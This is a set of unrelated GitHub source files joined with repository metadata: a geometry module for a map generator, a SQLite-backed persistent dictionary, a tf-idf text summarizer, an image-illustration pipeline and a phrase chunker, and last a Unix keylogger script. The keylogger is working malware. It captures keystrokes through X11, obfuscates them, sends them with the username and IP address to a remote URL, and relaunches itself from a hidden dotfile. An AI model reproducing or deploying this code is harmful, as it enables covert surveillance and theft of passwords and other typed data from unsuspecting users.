    base = polygon([(0, 0), (width, 0), (width, height), (0, height)])
    if width == height:
        return [base]
    return [base, shapely.affinity.rotate(base, 90, origin=(0,0))]
def circle(area):
    """Construct an approximately circular polygon whose radius is
    constrained to the grid and whose area is close to the request.
    """
    exact_radius = math.sqrt(area / math.pi)
    log.info("Exact radius would be {0}".format(exact_radius))
    # Candidate radii snapped to the grid along cardinal (5') and
    # diagonal (7') spacings.
    cardinal_radius = 5 * round(exact_radius/5, 0)
    diagonal_radius = 7 * round(exact_radius/7, 0)
    # Pick whichever candidate deviates least from the exact radius.
    if (math.fabs(exact_radius - diagonal_radius) <
            math.fabs(exact_radius - cardinal_radius)):
        radius = diagonal_radius
    else:
        radius = cardinal_radius
    log.info("Rounded radius to {0} or {1} --> chose {2}"
             .format(cardinal_radius, diagonal_radius, radius))
    # Even radii center on a grid intersection, odd ones on a grid square.
    if radius % 10 == 0 or radius % 14 == 0:
        center = Point(0, 0)
    else:
        center = Point(5, 5)
    return center.buffer(radius - 0.1)
def polygon_circle(area):
    """Construct a grid-constrained polygon (45-degree angles only)
    that roughly approximates a circle. Uses the midpoint circle algorithm.

    area: the target area; the radius is derived and snapped to the
    5' grid. Returns the resulting Polygon.
    """
    radius = math.sqrt(area / math.pi)
    grid_radius = 5 * round(radius/5, 0)
    log.info("Exact radius would be {0}; rounded to {1}"
             .format(radius, grid_radius))
    if grid_radius % 10 == 0:
        # For even radius, center around a grid intersection
        x0 = y0 = 0
    else:
        # For odd radius, center around a grid square
        x0 = y0 = 5
    # Midpoint circle algorithm, scaled to 10' steps: trace one octant
    # (from (r, 0) up to the 45-degree point) tracking an error term.
    x = grid_radius
    y = 0
    error = 10 - x
    point_list = []
    while x >= y:
        point_list.append((x, y))
        if error < 0:
            y += 10
            error += 2 * y + 10
        else:
            y += 10
            x -= 10
            error += 2 * (y - x + 10)
    # Mirror the traced octant into the other seven (alternating
    # forward/reversed order so the boundary stays contiguous).
    points = [(x + x0, y + y0) for (x, y) in point_list]
    points += [(y + x0, x + y0) for (x, y) in reversed(point_list)]
    points += [(-y + x0, x + y0) for (x, y) in point_list]
    points += [(-x + x0, y + y0) for (x, y) in reversed(point_list)]
    points += [(-x + x0, -y + y0) for (x, y) in point_list]
    points += [(-y + x0, -x + y0) for (x, y) in reversed(point_list)]
    points += [(y + x0, -x + y0) for (x, y) in point_list]
    points += [(x + x0, -y + y0) for (x, y) in reversed(point_list)]
    circ = Polygon(points)
    log.debug("Circle with area {0}: {1}".format(area, to_string(circ)))
    return circ
def circle_list(area):
    """Return a one-element list holding a circle of roughly the given
    area (list form for consistency with the other shape generators).
    """
    return [circle(area)]
def isosceles_right_triangle(area):
    """Construct a grid-constrained isosceles right triangle with
    approximately the requested area (leg length rounded to 10').
    """
    exact_leg = math.sqrt(area * 2)
    log.info("Ideal size would be {0}".format(exact_leg))
    leg = round(exact_leg, -1)
    log.info("Rounded size to {0}".format(leg))
    return polygon([(0, 0), (leg, 0), (0, leg)])
def triangle_list(area, rotate=True):
    """Return right triangles of roughly the given area -- one per
    90-degree orientation when rotate is True, otherwise just one.
    """
    base = isosceles_right_triangle(area)
    if not rotate:
        return [base]
    return [base] + [shapely.affinity.rotate(base, angle)
                     for angle in (90, 180, 270)]
def trapezoid_list(area, rotate_and_mirror=True):
    """Returns a list of possible trapezoids (various height/width ratios,
    various orientations) with approximately the requested area.
    We support two kinds of trapezoids:
    w1          w2
    |----\     /--\
  h |     \ and   h /    \
    |------\   /------\
    both with nice 45 degree angles.
    In theory, these can vary widely in their aspect ratio:
    w=10           h=10
    |-\            |----\
    |  \     vs.   |-----\
    |   \
    |----\
    To keep the number of permutations reasonable, we will only consider
    variants where the ratio of width to height is "pleasing".
    This ratio is very much arbitrary and hand-tuned.
    """
    log.info("Generating list of trapezoids with area {0}".format(area))
    trapezoids = []
    # Scan heights from roughly sqrt(area/2) up to sqrt(3*area/2), in
    # 10' steps; the top-edge widths are derived from the area formula.
    for h in range(int(10 * math.ceil(math.sqrt(area/2) / 10)),
                   int(10 * math.ceil(math.sqrt(area * 3/2) / 10)), 10):
        w1 = round((area / h) - (h / 2), -1)
        w2 = round((area / h) - h, -1)
        log.debug("Candidates: one-sided {w1} x {h}, two-sided {w2} x {h}"
                  .format(w1=w1, w2=w2, h=h))
        # w1 is larger than w2, so if it's too small we know we're done
        if w1 < 10:
            break
        if w1 >= 10 and (2 * w1 >= h):
            # one-sided trapezoid - 8 possible orientations
            # (4 rotations of the base shape, then 4 of its mirror image)
            trapezoid = polygon([(0, 0), (w1 + h, 0), (w1, h), (0, h)])
            log.debug("one-sided trapezoid: {0}, area {1}"
                      .format(to_string(trapezoid), trapezoid.area))
            trapezoids.append(trapezoid)
            if rotate_and_mirror:
                trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
                                                          origin=(0, 0)))
                # Mirror across the y axis, then rotate that too.
                trapezoid = shapely.affinity.scale(trapezoid, xfact=-1.0)
                trapezoids.append(trapezoid)
                trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
                                                          origin=(0, 0)))
        if w2 >= 10 and (3 * w2) >= h:
            # two-sided trapezoid - 4 possible orientations
            # (symmetric, so mirroring adds nothing)
            trapezoid = polygon([(0, 0), (h + w2 + h, 0), (h + w2, h), (h, h)])
            log.debug("two-sided trapezoid: {0} area {1}"
                      .format(to_string(trapezoid), trapezoid.area))
            trapezoids.append(trapezoid)
            if rotate_and_mirror:
                trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
                                                          origin=(0, 0)))
                trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
                                                          origin=(0, 0)))
    return trapezoids
def oval_list(area, rotate=True):
    """Construct a list of ovals (actually, capsule shapes) that are
    grid-constrained but have approximately the requested area.

    Each capsule is built by lofting between a left and a right
    semicircular arc; when rotate is True a 90-degree-rotated copy of
    each capsule is emitted as well.
    """
    # Ovals are a pain to calculate and not likely to fit nicely into
    # a map in any case. Instead, we'll construct a capsule-shaped room:
    #    -------
    #   /       \
    #  |         |
    #   \       /
    #    -------
    #
    # The area of such a room is w * h + pi * (h/2)^2
    # or area = h * (w + (pi/4 * h))
    # area ~= h * (w + 0.75h)
    # area / h ~= w + 0.75h
    # w ~= area / h - 0.75h
    #
    # For w = h, area = 5/4 pi * h^2 ~= 4 h^2
    # For h = 10, w ~= area/10 - 10
    # For w = 10, area ~= a circle
    ovals = []
    for h in range(int(10 * math.ceil(math.sqrt(area/4) / 10)),
                   int(10 * math.ceil(math.sqrt(area) / 10)),
                   10):
        w = round(area / h - ((math.pi / 4) * h), -1)
        log.info("Candidate: {w} x {h} ({w}+{h} x {h})".format(w=w, h=h))
        # Odd heights are shifted by half a square to stay on the grid.
        if h % 20 == 0:
            offset = 0
        else:
            offset = 5
        circle = point(w - 0.01 + offset, offset).buffer(h/2, resolution=16)
        # circle is a set of (16 * 4 + 1) points counterclockwise from (x, 0)
        # NOTE(review): the slice indices below (17:48, 49:, 0:16) carve
        # the left and right arcs out of that 65-point ring and depend on
        # shapely's buffer() vertex ordering -- verify if shapely changes.
        left_arc = line([(offset, -h/2 + offset)] +
                        translate(circle, -w + 0.02, 0).exterior.coords[17:48] +
                        [(offset, h/2 + offset)])
        right_arc = line([(w + offset, h/2 + offset)] +
                         circle.exterior.coords[49:] +
                         circle.exterior.coords[0:16] +
                         [(w + offset, -h/2 + offset)])
        oval = loft(left_arc, right_arc)
        ovals.append(oval)
        if rotate:
            ovals.append(shapely.affinity.rotate(oval, 90, origin=(0,0)))
    return ovals
def hexagon_list(area, rotate=True):
    """Construct grid-constrained "hexagons" (45-degree corners only)
    with approximately the requested area, across a hand-tuned range of
    width-to-height ratios. When rotate is True each hexagon is also
    emitted rotated 90 degrees.
    """
    results = []
    # Core rectangle w*h plus two h/2*h end triangles => area ~ w*h + h^2/2.
    lower = int(10 * math.ceil(math.sqrt(area * 2/3) / 10))
    upper = int(10 * math.ceil(math.sqrt(area * 3/2) / 10))
    for h in range(lower, upper, 10):
        w = round((area / h) - (h / 2), -1)
        log.debug("Constructing hexagon with width {w} and height {h}"
                  .format(w=w, h=h))
        if w < 10:
            break
        # Odd heights are shifted by half a square to stay on the grid.
        offset = 0 if h % 20 == 0 else 5
        shape = polygon([(h/2 + offset, 0), (offset, h/2),
                         (h/2 + offset, h), (h/2 + w + offset, h),
                         (h + w + offset, h/2), (h/2 + w + offset, 0)])
        results.append(shape)
        if rotate:
            results.append(shapely.affinity.rotate(shape, 90, origin=(0, 0)))
    return results
def octagon_list(area):
    """Return a single grid-constrained octagon with approximately the
    requested area, formed by cutting the corners off a square.

    Only one "reasonably ideal" corner-to-side ratio is generated for
    now; more variants could be added later. TODO?
    """
    # The octagon covers roughly 7/9 of its bounding square's area.
    sq_size = math.sqrt(area * 9 / 7)
    size = round(sq_size, -1)
    log.info("Ideal size would be {0}, rounded to {1}"
             .format(sq_size, size))
    # How far in from each corner the 45-degree cut begins.
    corner_offset = 10 * math.floor(size / 30)
    corners = [(0, corner_offset), (0, size - corner_offset),
               (corner_offset, size), (size - corner_offset, size),
               (size, size - corner_offset), (size, corner_offset),
               (size - corner_offset, 0), (corner_offset, 0)]
    return [polygon(corners)]
# Geometric interaction
def union(*args):
    """Union the provided shapes (or a single iterable of shapes) and
    simplify the result.
    """
    if len(args) == 1:
        args = args[0]
    merged = shapely.ops.cascaded_union(args)
    return merged.simplify(0)
def intersect(geometry_1, geometry_2):
    """Intersect the two given shapes and clean up the result as needed.

    When the raw intersection is purely linear (zero area, positive
    length) and fragmented into a multi-part geometry, its line pieces
    are merged back together.
    """
    result = geometry_1.intersection(geometry_2)
    if result.is_empty:
        return result
    log.debug("Naive intersection is {0}".format(to_string(result)))
    purely_linear = (result.area == 0 and result.length > 0)
    if purely_linear and hasattr(result, "geoms"):
        # The linework is sometimes fragmented unnecessarily into points
        # and segments; linemerge() rejoins the segments. It dislikes
        # points, so only pieces with nonzero length are kept.
        fragments = [geom for geom in result.geoms if geom.length > 0]
        result = shapely.ops.linemerge(fragments)
    log.debug("Cleaned up intersection is {0}"
              .format(to_string(result)))
    return result
def differ(geometry_1, geometry_2):
    """Take the difference of the two given shapes and clean up
    the result as needed.

    Asserts that the final difference is a valid geometry.
    """
    difference = geometry_1.difference(geometry_2)
    if difference.is_empty:
        return difference
    log.debug("Naive difference is {0}".format(to_string(difference)))
    if difference.area > 0 and not difference.is_valid:
        # The resulting polygon may be overly complex - simplify it
        # if we can.
        difference = difference.buffer(0)
    log.debug("Cleaned up difference is {0}".format(to_string(difference)))
    assert difference.is_valid, ("difference of {0} and {1} is not valid: {2}"
                                 .format(to_string(geometry_1),
                                         to_string(geometry_2),
                                         shapely.validation.explain_validity(difference)))
    return difference
| {
"repo_name": "glennmatthews/aagen",
"path": "aagen/geometry.py",
"copies": "1",
"size": "56617",
"license": "mit",
"hash": 5207080264397008000,
"line_mean": 38.4543554007,
"line_max": 80,
"alpha_frac": 0.5547980289,
"autogenerated": false,
"ratio": 3.65766522385167,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47124632527516697,
"avg_score": null,
"num_lines": null
} |
"""A alternate implementation of the persistent dict found in
http://erezsh.wordpress.com/2009/05/24/filedict-a-persistent-dictionary-in-python/
"""
import sqlite3, UserDict, pickle
def key(k):
    """Return the (hash, pickled-bytes) pair used to index *k* in the table."""
    pickled = pickle.dumps(k)
    return hash(k), pickled
class persistentDict(UserDict.DictMixin):
    """A dict-like object persisted in a SQLite table.

    Keys and values are stored pickled; rows are indexed by the key's
    hash so lookups can use the index on the ``hash`` column.
    (Python 2 only: relies on UserDict.DictMixin, old-style ``raise``
    and tuple-unpacking parameters.)
    """
    def __init__(self, filetable, d=None, **kwarg):
        # filetable is either a plain filename or a (filename, table) tuple.
        if isinstance(filetable, tuple):
            filename, self._table = filetable
        else:
            filename = filetable
            self._table = 'dict'
        self._db = sqlite3.connect(filename)
        # NOTE(review): the table name is interpolated with %, so it must
        # come from trusted code, never from user input.
        self._db.execute('create table if not exists %s (hash integer, key blob, value blob);' % self._table)
        self._db.execute('create index if not exists %s_index ON %s(hash);' % (self._table, self._table))
        self._db.commit()
        # Seed initial contents from d and/or keyword arguments.
        self.update(d, **kwarg)
    def __getitem__(self, k):
        v = self._db.execute('select value from %s where hash=? and key=?;' % self._table, key(k)).fetchone()
        if v:
            return pickle.loads(str(v[0]))
        raise KeyError, k
    def _setitem(self, (hkey, pkey), pval):
        # Insert-or-update on an already hashed/pickled key; caller commits.
        if self._contains((hkey, pkey)):
            self._db.execute('update %s set value=? where hash=? and key=?' % self._table, (pval, hkey, pkey))
        else:
            self._db.execute('insert into %s values (?,?,?)' % self._table, (hkey, pkey, pval))
    def __setitem__(self, k, v):
        self._setitem(key(k), pickle.dumps(v))
        self._db.commit()
    def __delitem__(self, k):
        # rowcount <= 0 means no row matched, i.e. the key was absent.
        if self._db.execute('delete from %s where hash=? and key=?;' % self._table, key(k)).rowcount <=0:
            raise KeyError, k
        self._db.commit()
    def _contains(self, k):
        # k is an already hashed/pickled (hash, bytes) pair.
        res, = self._db.execute('select count(*) from %s where hash=? and key=?;' % self._table, k)
        return res[0]>0
    def __contains__(self, k):
        return self._contains(key(k))
    def __iter__(self):
        for k, in self._db.execute('select key from '+self._table):
            yield pickle.loads(str(k))
    def keys(self):
        return list(iter(self))
    def insert(self, seq):
        # Bulk insert: a single commit for the whole (k, v) sequence.
        for k,v in seq:
            self._setitem(key(k), pickle.dumps(v))
        self._db.commit()
if __name__ == '__main__':
    # Smoke test: exercises set/get/delete/contains/bulk-insert paths
    # against a throwaway database file (Python 2 print statements).
    d = persistentDict((r'c:\bortest\db.dat', 'new'), k1=1)
    d['k2'] = 1
    d['k2'] = 2
    try:
        del d['k3']
    except KeyError:
        print 'OK'
    print d.keys()
    del d['k1']
    d.insert((i, str(i)) for i in range(10000))
    try:
        print d['k4']
    except KeyError:
print 'OK' | {
"repo_name": "zepheira/zenpub",
"path": "lib/persistentdict.py",
"copies": "2",
"size": "2517",
"license": "apache-2.0",
"hash": 7994470178415378000,
"line_mean": 35.4927536232,
"line_max": 110,
"alpha_frac": 0.5613825983,
"autogenerated": false,
"ratio": 3.396761133603239,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49581437319032384,
"avg_score": null,
"num_lines": null
} |
# AAR Natural Language Processing/Machine Learning Project 2015-2016
# Summarizes text using tf-idf technique
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires Node.js and Python 2.7
from __future__ import division
import math
from textblob import TextBlob as tb
def tf(word, blob):
    """Term frequency: occurrences of *word* divided by total word count."""
    words = blob.words
    return words.count(word) / len(words)
def n_containing(word, bloblist):
    """Number of documents in *bloblist* that contain *word* at least once."""
    count = 0
    for doc in bloblist:
        if word in doc:
            count += 1
    return count
def idf(word, bloblist):
    """Inverse document frequency, with +1 smoothing in the denominator."""
    doc_freq = n_containing(word, bloblist)
    return math.log(len(bloblist) / (1 + doc_freq))
def tfidf(word, blob, bloblist):
    """tf-idf score of *word* for *blob* relative to *bloblist*."""
    return idf(word, bloblist) * tf(word, blob)
def summarize(document1):
    """Return the top-scoring sentences of *document1* joined as one string.

    Each sentence is treated as a "document" for tf-idf; a sentence's
    relevance is the mean tf-idf of its words.
    """
    document1 = tb(document1)
    bloblist = document1.sentences
    relevance_scores = []
    relevancy = {}
    for i, blob in enumerate(bloblist):
        # print "Top words in sentence " + str(i)
        scores = {word: tfidf(word, blob, bloblist) for word in blob.words}
        sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)
        relevance = 0
        sum_relevancy = 0
        for word, score in sorted_words:
            # print "\tWord: {}, TF-IDF: {}".format(word, score)
            sum_relevancy += score
        # Mean tf-idf over the sentence's distinct words.
        relevance = sum_relevancy/len(sorted_words)
        relevance_scores.append(relevance)
        # Keyed by the sentence index as a string.
        relevancy[str(i)] = relevance
    relevance_scores.sort(reverse=True)
    final_sentences = []
    # Keep the top 3 sentences (top 1 for very short texts).
    num_top_results = 3
    if len(bloblist) < 3:
        num_top_results = 1
    # Map each top score back to its sentence index.
    # NOTE(review): sentences with tied scores are appended once per
    # matching top score, so duplicates are possible -- confirm intended.
    for s in range(0, len(relevance_scores[:num_top_results])):
        for key in relevancy:
            if relevancy[key] == relevance_scores[s]:
                final_sentences.append(int(key))
    final_sentences.sort()
    # Reassemble the chosen sentences in document order.
    final_text = ""
    for x in range(0, len(final_sentences)):
        if x != 0:
            final_text += " " + str(document1.sentences[final_sentences[x]]).replace('\n', '')
        else:
            final_text = str(document1.sentences[final_sentences[x]]).replace('\n', '')
    return str(final_text)
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "summarize.py",
"copies": "1",
"size": "2003",
"license": "mit",
"hash": -6764328423177965000,
"line_mean": 32.3833333333,
"line_max": 94,
"alpha_frac": 0.6345481777,
"autogenerated": false,
"ratio": 3.383445945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4517994123645946,
"avg_score": null,
"num_lines": null
} |
# AAR Natural Language Processing/Machine Learning Project 2015-2016
# Takes plaintext as input and illustrates interpretation
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires Node.js and Python 2.7
# $ npm install && pip install -r requirements.txt
import os, json, uuid, urllib, errno, requests
from os.path import join, dirname
from subprocess import check_output as call
from dotenv import load_dotenv
import text_parse as textEngine
import summarize as summaryEngine
from images2gif import writeGif
dl = urllib.URLopener()
from imagesoup import ImageSoup
soup = ImageSoup()
def getImageFromString(s):
    """Return the URL of the top image-search hit for the quoted phrase *s*."""
    results = soup.search('"' + s + '"', n_images=1)
    return results[0].URL
def generateGIF(file_names, size, uid):
    """Resize the frames under ./tmp_images/<uid>/ and write them out as
    ./tmp_images/<uid>.gif (0.5 s per frame).

    NOTE(review): ``Image`` (PIL) is referenced here but not imported in
    the visible module header -- confirm the import exists elsewhere.
    """
    # First pass: normalize every frame to the requested size in place.
    for fn in file_names:
        im = Image.open("./tmp_images/"+uid+"/"+fn)
        im = im.resize(size, Image.ANTIALIAS)
        im.save("./tmp_images/"+uid+"/"+fn, "JPEG")
    # Second pass: reload the resized frames and assemble the GIF.
    images = [Image.open("./tmp_images/"+uid+"/"+fn) for fn in file_names]
    writeGif("./tmp_images/"+uid+".gif", images, duration=0.5)
def make_dir(path):
    """Create *path* (with parents), ignoring the error if it already exists."""
    try:
        os.makedirs(path)
    except OSError as exception:
        # Only "already exists" is benign; re-raise everything else.
        if exception.errno != errno.EEXIST:
            raise
def genTextMetrics(raw_text):
    """Summarize *raw_text* and attach an illustrative image URL to the
    subject, verb and (optional) object of each summary sentence.

    Returns a dict: {"summary": str, "svo_data": [per-sentence dicts]}.
    """
    summary = summaryEngine.summarize(raw_text)
    svo = textEngine.extract(summary)
    final_text_data = {
        "summary": summary,
        "svo_data": []
    }
    for scene in svo:
        # print scene
        # Prefer the simplified (noun-only) phrase; fall back to raw text.
        sent_subject = scene["raw_subject"] if len(scene["simple_subject"]) == 0 else scene["simple_subject"]
        sent_object = scene["raw_object"] if len(scene["simple_object"]) == 0 else scene["simple_object"]
        sent_predicate = scene["predicate"]
        # Look up one image per phrase; objects are optional.
        file_urls = {}
        file_urls["subject"] = getImageFromString(sent_subject)
        file_urls["verb"] = getImageFromString(sent_predicate)
        if len(sent_object) != 0:
            # print "OBJECT"
            file_urls["object"] = getImageFromString(sent_object)
        sent_data = {
            "subject": {
                "text": sent_subject,
                "image": file_urls["subject"]
            },
            "verb": {
                "text": sent_predicate,
                "image": file_urls["verb"]
            },
            "object": {
                "text": sent_object,
                "image": file_urls["object"] if len(sent_object) != 0 else None
            }
        }
        final_text_data["svo_data"].append(sent_data)
    return final_text_data
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "illustrate.py",
"copies": "1",
"size": "2505",
"license": "mit",
"hash": -2195621201175721200,
"line_mean": 29.9259259259,
"line_max": 109,
"alpha_frac": 0.6031936128,
"autogenerated": false,
"ratio": 3.7276785714285716,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9815043675742762,
"avg_score": 0.0031657016971618677,
"num_lines": 81
} |
# AAR Natural Language Processing Project 2015-2016
# Takes plaintext as input and illustrates interpretation
# Written by Gautam Mittal
# Mentor: Robert Cheung
# Requires NLTK and its respective corpora
import re
import nltk
from nltk import CFG, ChartParser, RegexpParser
from nltk.corpus import stopwords, conll2000
from textblob import TextBlob as tb
from textblob import Word as word
from textblob.parsers import PatternParser
from contractions import *
# CoNLL-2000 chunking corpus: training and evaluation sentences annotated
# with NP/VP/PP chunks.
train_sents = conll2000.chunked_sents('train.txt', chunk_types=['NP', 'VP', 'PP'])
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP', 'VP', 'PP'])
class BigramChunker(nltk.ChunkParserI):
    """Chunker that predicts IOB chunk tags from POS-tag bigrams,
    trained on CoNLL-2000-style chunked sentences."""
    def __init__(self, train_sents):
        # Train on (POS tag, chunk tag) sequences extracted from the trees.
        train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)]
                      for sent in train_sents]
        self.tagger = nltk.BigramTagger(train_data)
    def parse(self, sentence):
        """Chunk a POS-tagged sentence and return it as an nltk chunk tree."""
        pos_tags = [pos for (word,pos) in sentence]
        # Tag the POS sequence with chunk labels, then re-attach the words.
        tagged_pos_tags = self.tagger.tag(pos_tags)
        chunktags = [chunktag for (pos, chunktag) in tagged_pos_tags]
        conlltags = [(word, pos, chunktag) for ((word,pos),chunktag)
                     in zip(sentence, chunktags)]
        return nltk.chunk.conlltags2tree(conlltags)
# Train the chunker once at import time and report its accuracy (Python 2).
bigram_chunker = BigramChunker(train_sents)
print bigram_chunker.evaluate(test_sents) # chunker accuracy
def tokenize(string):
    """Split *string* on spaces into words, expanding contractions in place."""
    string = str(string.replace("\n", ""))#.replace(".", ""))
    words = string.split(" ")
    # NOTE(review): range(len(words)) is computed before insertions grow the
    # list, so words pushed beyond the original length are never checked for
    # contractions -- confirm this is intended.
    for w in range(0, len(words)): # fix contractions
        if (words[w].lower().find("'") > -1):
            if (words[w] in contractions):
                replace_contract = contractions[words[w]]
                words.pop(w)
                # Insert the expansion words reversed so they end up in order.
                r = list(reversed(replace_contract.split(" ")))
                for cw in range(0, len(r)):
                    words.insert(w, r[cw])
    return words
def prepare_text(stringBlob):
    """Tokenize the input text.

    (Automatic language detection/translation to English used to happen
    here but is currently disabled.)
    """
    return tokenize(stringBlob)
def treeToJSON(t):
    """Convert a chunk tree into a list of {'label': ..., 'text': ...} dicts.

    Leaf (word, tag) tuples are skipped; only chunk subtrees (objects that
    expose ``.label()``) are converted.
    """
    phrases = []
    for p in list(t):
        # Leaves are plain tuples.  The original compared
        # str(type(p)) != "<type 'tuple'>", which only matches the Python 2
        # type repr and therefore silently keeps leaves on Python 3;
        # isinstance() is correct on both.
        if not isinstance(p, tuple):
            phraseJSON = {
                'label': p.label(),
                'text': list(p)
            }
            phrases.append(phraseJSON)
    return phrases
def stringifyTree(t):
    """Join the word part of each (word, tag) pair in *t* with spaces."""
    return " ".join(pair[0] for pair in t)
def simplifyTree(t):
    """Remove non-noun (word, tag) pairs from *t* in place, then stringify.

    Mutates the caller's list.  Callers sometimes pass an empty string
    instead of a list; the loop then simply does nothing.
    """
    # Iterate over a snapshot so removal during the walk is safe.
    for pair in list(t):
        if "NN" not in pair[1]:
            t.remove(pair)
    return stringifyTree(t)
def analyze_sent_semantics(sentenceBlob):
    """Extract a subject / predicate / object guess from one sentence.

    Returns a dict with raw and simplified (noun-only) subject and object
    strings plus the predicted predicate string.
    """
    tagged_s = tb(" ".join(prepare_text(sentenceBlob))).tags
    sent_tree = bigram_chunker.parse(tagged_s)
    sent_tree = treeToJSON(sent_tree) # convert to format that we can work with
    # verify the verb phrases: a "VP" without any VB* tag inside is demoted
    # so it is not mistaken for the predicate below.
    for p in range(0, len(sent_tree)):
        phrase = sent_tree[p]
        if phrase["label"] == "VP":
            verbCount = 0
            for w in phrase["text"]:
                if w[1].find("VB") > -1:
                    verbCount += 1
            if verbCount == 0:
                phrase["label"] = "PSEUDO-VP"
    # print(sent_tree)
    predicted_subject = []
    predicted_verb = str()
    predicted_actionable_noun = str()
    for ph in range(0, len(sent_tree)):
        p = sent_tree[ph]
        # Accumulate NPs (and PPs directly following an NP) as the subject.
        if p["label"] == "NP" or (p["label"] == "PP" and (sent_tree[ph-1]["label"] == "NP" and ph-1 > -1)):
            for t in p["text"]:
                predicted_subject.append(t)
        if p["label"] == "VP":
            predicted_verb = stringifyTree(p["text"])
            # iterate over everything after the predicate
            for o_i in range(ph, len(sent_tree)):
                o = sent_tree[o_i]
                # First NP (or NP-following PP) after the verb is the object.
                if o["label"] == "NP" or (o["label"] == "PP" and (sent_tree[o_i-1]["label"] == "NP" and o_i-1 > -1)):
                    predicted_actionable_noun = o["text"]
                    break
                # A PP right after the verb extends the predicate instead.
                if o["label"] == "PP" and stringifyTree(sent_tree[o_i-1]["text"]) == predicted_verb:
                    predicted_verb += " " + stringifyTree(o["text"])
                    break
    # print("Subject: " + stringifyTree(predicted_subject)) # what we think the subject might be
    # print("Predicate: " + predicted_verb)
    # print("Object: " + stringifyTree(predicted_actionable_noun))
    # NOTE: raw_* entries are built before simplifyTree mutates the lists.
    semantics_analysis = {
        "raw_subject": stringifyTree(predicted_subject),
        "simple_subject": simplifyTree(predicted_subject),
        "predicate": predicted_verb,
        "raw_object": stringifyTree(predicted_actionable_noun),
        "simple_object": simplifyTree(predicted_actionable_noun)
    }
    return semantics_analysis
def extract(storyString):
    """Run subject/predicate/object analysis over every sentence of the text."""
    story = tb(storyString)
    return [analyze_sent_semantics(sentence) for sentence in story.sentences]
| {
"repo_name": "gmittal/aar-nlp-research-2016",
"path": "text_parse.py",
"copies": "1",
"size": "5047",
"license": "mit",
"hash": 6458818097905399000,
"line_mean": 34.5422535211,
"line_max": 117,
"alpha_frac": 0.5908460472,
"autogenerated": false,
"ratio": 3.526904262753319,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9599177645486878,
"avg_score": 0.003714532893288173,
"num_lines": 142
} |
# Aaron Reyes
# MIT license
import os
import time
import urllib
import random
import base64
import ctypes
import ctypes.util
# name of logger program on file system
LOGGER_NAME='.bash_xkey'
# remote logging URL
REMOTE_LOG_URL='<google scripts url here>?{0}'
# load library
x11 = ctypes.cdll.LoadLibrary(ctypes.util.find_library("X11"))
display = x11.XOpenDisplay(None)
keyboard = (ctypes.c_char * 32)()
key_map = {
9: ["<esc>","<esc>"],
10: ["1", "!"],
11: ["2", "@"],
12: ["3", "#"],
13: ["4", "$"],
14: ["5", "%"],
15: ["6", "^"],
16: ["7", "&"],
17: ["8", "*"],
18: ["9", "("],
19: ["0", ")"],
20: ["-", "_"],
21: ["=", "+"],
22: ["<del>", "<del>"],
23: ["<tab>", "<tab>"],
24: ["q", "Q"],
25: ["w", "W"],
26: ["e", "E"],
27: ["r", "R"],
28: ["t", "T"],
29: ["y", "Y"],
30: ["u", "U"],
31: ["i", "I"],
32: ["o", "O"],
33: ["p", "P"],
34: ["[", "{"],
35: ["]", "}"],
36: ["<ret>", "<ret>"],
37: ["<ctrl>", "<ctrl>"],
38: ["a", "A"],
39: ["s", "S"],
40: ["d", "D"],
41: ["f", "F"],
42: ["g", "G"],
43: ["h", "H"],
44: ["j", "J"],
45: ["k", "K"],
46: ["l", "L"],
47: [";", ":"],
48: ["'", '"'],
49: ["`", "~"],
51: ["\\", "|"],
52: ["z", "Z"],
53: ["x", "X"],
54: ["c", "C"],
55: ["v", "V"],
56: ["b", "B"],
57: ["n", "N"],
58: ["m", "M"],
59: [",", "<"],
60: [".", ">"],
61: ["/", "?"],
65: [" ", " "]
}
log = []
shift = False
pressed = set()
last_pressed = set()
now = time.time()
# log for 1 to 3 minutes
while time.time() < now + random.randint(60,180):
time.sleep(0.005)
x11.XQueryKeymap(display, keyboard)
# check for shift first
if ((1 << 2) & ord(keyboard[6])) or ((1 << 6) & ord(keyboard[7])):
shift = True
else:
shift = False
for i in range(len(keyboard)):
for j in range(8):
code = (i * 8) + j
if ((1 << j) & ord(keyboard[i])) and code in key_map:
pressed.add(code)
if code not in last_pressed:
if shift:
log.append(key_map[code][1])
else:
log.append(key_map[code][0])
last_pressed = set(pressed)
pressed.clear()
# basic obfuscation
log = '-'.join([str(ord(x) ^ 0x5A) for x in base64.b64encode(''.join(log))])
# send log if there is data
if log:
user = os.popen('whoami').read().strip()
ip = os.popen('hostname -I').read().strip()
params = urllib.urlencode({'api': '|'.join([log, user, ip])})
urllib.urlopen(REMOTE_LOG_URL.format(params))
# kick off the logger again
cmd = "import base64;f=open('{0}','rb');c=f.read().split('-');f.close();exec(base64.b64decode(''.join([chr(int(x)^0xA5) for x in c])))".format(LOGGER_NAME)
os.popen('echo "{0}" | python 2>/dev/null &'.format(cmd))
| {
"repo_name": "a-rey/bitflip",
"path": "keylogger/unix/logger.py",
"copies": "1",
"size": "2717",
"license": "mit",
"hash": 2334387897977272000,
"line_mean": 21.8319327731,
"line_max": 155,
"alpha_frac": 0.4729481045,
"autogenerated": false,
"ratio": 2.6225868725868726,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8521931246108152,
